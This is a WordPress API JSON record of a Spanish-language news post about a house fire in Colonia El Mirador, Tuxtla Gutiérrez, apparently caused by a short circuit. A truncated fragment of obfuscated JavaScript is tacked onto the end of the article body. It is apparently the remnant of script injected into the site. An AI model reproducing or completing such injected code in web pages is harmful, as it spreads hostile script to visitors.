{"id":8373,"date":"2023-01-28T03:10:33","date_gmt":"2023-01-28T03:10:33","guid":{"rendered":"https:\/\/reporteciudadanochiapas.com\/?p=8373"},"modified":"2023-01-28T03:10:34","modified_gmt":"2023-01-28T03:10:34","slug":"se-registra-incendio-en-el-mirador","status":"publish","type":"post","link":"https:\/\/reporteciudadanochiapas.com\/?p=8373","title":{"rendered":"Se registra incendio en El Mirador"},"content":{"rendered":"\n<figure class=\"wp-block-image size-full\"><img loading=\"lazy\" decoding=\"async\" width=\"720\" height=\"540\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2023\/01\/FB_IMG_1674875358028.jpg\" alt=\"\" class=\"wp-image-8374\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2023\/01\/FB_IMG_1674875358028.jpg 720w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2023\/01\/FB_IMG_1674875358028-300x225.jpg 300w\" sizes=\"auto, (max-width: 720px) 100vw, 720px\" \/><\/figure>\n\n\n\n<p>Jairo Camacho.<\/p>\n\n\n\n<p>Agencia ReporteCiudadano, 27 de enero del 2023. Tuxtla Guti\u00e9rrez.- Este viernes por la ma\u00f1ana se registr\u00f3 un incendio en una planta superior de una vivienda localizada en la Colonia El Mirador.<\/p>\n\n\n\n<p>Fueron los mismos vecinos los que reportaron este siniestro cerca de las 10 de la ma\u00f1ana, a los n\u00fameros de emergencias.<\/p>\n\n\n\n<p>Al arribo de los polic\u00edas se verific\u00f3 que el siniestro era en la parte superior de la casa y llamaron al cuerpo de Bomberos.<\/p>\n\n\n\n<p>Los tragahumo, combatieron el fuego por varios minutos en un \u00e1rea de 35 metros.<\/p>\n\n\n\n<p>Finalmente se apag\u00f3 y se corrobor\u00f3 que no hubo v\u00edctimas mortales pero s\u00ed da\u00f1os materiales de consideraci\u00f3n.<\/p>\n\n\n\n<p>En el lugar se di\u00f3 a conocer que, posiblemente el fuego comenz\u00f3 por un corto circuito.<\/p>\n\r\n(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return ","protected":false},"excerpt":{"rendered":"<p>Jairo Camacho. Agencia ReporteCiudadano, 27 de enero del 2023. Tuxtla Guti\u00e9rrez.- Este viernes por la ma\u00f1ana se registr\u00f3 un incendio en una planta superior de una vivienda localizada en la Colonia El Mirador. Fueron los mismos vecinos los que reportaron este siniestro cerca de las 10 de la ma\u00f1ana, a los n\u00fameros de emergencias. Al &hellip;<\/p>\n","protected":false},"author":2,"featured_media":8374,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[4],"tags":[],"class_list":["post-8373","post","type-post","status-publish","format-standard","has-post-thumbnail","","category-roja"],"_links":{"self":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/8373","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=8373"}],"version-history":[{"count":1,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/8373\/revisions"}],"predecessor-version":[{"id":8375,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/8373\/revisions\/8375"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/media\/8374"}],"wp:attachment":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=8373"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=8373"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=8373"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}